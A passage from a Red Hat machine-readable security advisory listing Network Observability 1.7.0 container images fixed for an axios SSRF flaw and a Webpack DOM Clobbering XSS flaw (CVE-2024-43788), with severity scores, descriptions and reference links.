"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: axios: Server-Side Request Forgery"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
